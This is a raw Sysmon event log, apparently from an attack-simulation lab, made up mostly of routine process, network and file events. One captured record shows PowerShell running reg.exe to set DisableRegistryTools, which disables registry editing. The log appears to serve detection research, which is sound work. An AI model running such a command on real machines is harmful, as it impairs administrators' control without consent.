10341000x800000000000000010830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.161{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000010849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:19.616{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53710-false10.0.1.12-8000- 23542300x800000000000000010848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:20.254{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=072929EC0C252382E81428444594EDD9,SHA256=663F18E2164C56148F5BF4AE1787F0EE584DD69A70D3194CDA5F12CC1C3A872A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:21.270{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=468AAF27FFC144C78DFCAD909A1C5976,SHA256=DAD85456DA344C586E93467D8AC62422EAD449FF4FE1C8DB73354D26190E9B90,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:22.926{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryToolsDWORD (0x00000001) 10341000x800000000000000010859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-65AC-6064-5101-00000000AE01}55606832C:\Windows\system32\conhost.exe{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:22.895{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.895{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:22.895{266CAFBE-65AB-6064-5001-00000000AE01}24562612C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+781c0|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+23cc02(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aaaa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aa39c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5d4219a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537afa3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537aca0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5cb9293(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5344c0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5394e98(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1
c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537cd75(wow64) 154100x800000000000000010852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.898{266CAFBE-6672-6064-7201-00000000AE01}724C:\Windows\SysWOW64\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=ECB768001DC8424E9B1FF3AC1E89C937,SHA256=CBB9F8D012CB0AF2CA87AC74ABB5C77A7743C64697C8D92104D3EBA27A699AB0,IMPHASH=7EF58A970E6E6D04FE3D5D7732CF5BAA{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000010851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:22.348{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FF04A31BA46CE0A439A39CD04EAAEF6,SHA256=20E9A76A4851DE612F4B7EB79B70ADC09234CF929665C6F51EEC764D6076057F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:23.863{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A65EFD1A7B6B0CDF929B8688224413C9,SHA256=DDA179FCDA713E418C43ECF9EADB07CA546C170A8C61E6A4F195BBCE6EC0DEB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:23.394{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFD33E32BE99427C6D29C19E9B41CA4B,SHA256=7E12BB6ECF9E7E2A6715BA41A98B01B642817E2089D098531C17890ECC512FE1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:24.504{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:24.457{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45F7BC4551B5CB03199D17FE66ACE879,SHA256=6FAFBF8372CF92F168CC02466A240671C9EEAE91D08C003F9CBE2FD3BBC8A4CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:24.254{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:24.254{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:24.254{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:24.254{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x800000000000000010884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.472{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=776244788749ABD8873F89E7C647AF99,SHA256=0697132AF0F27C167AEC494C0EE38DEFE2AE38BEB0C6FB196F5CA9E3E9C8CAF8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.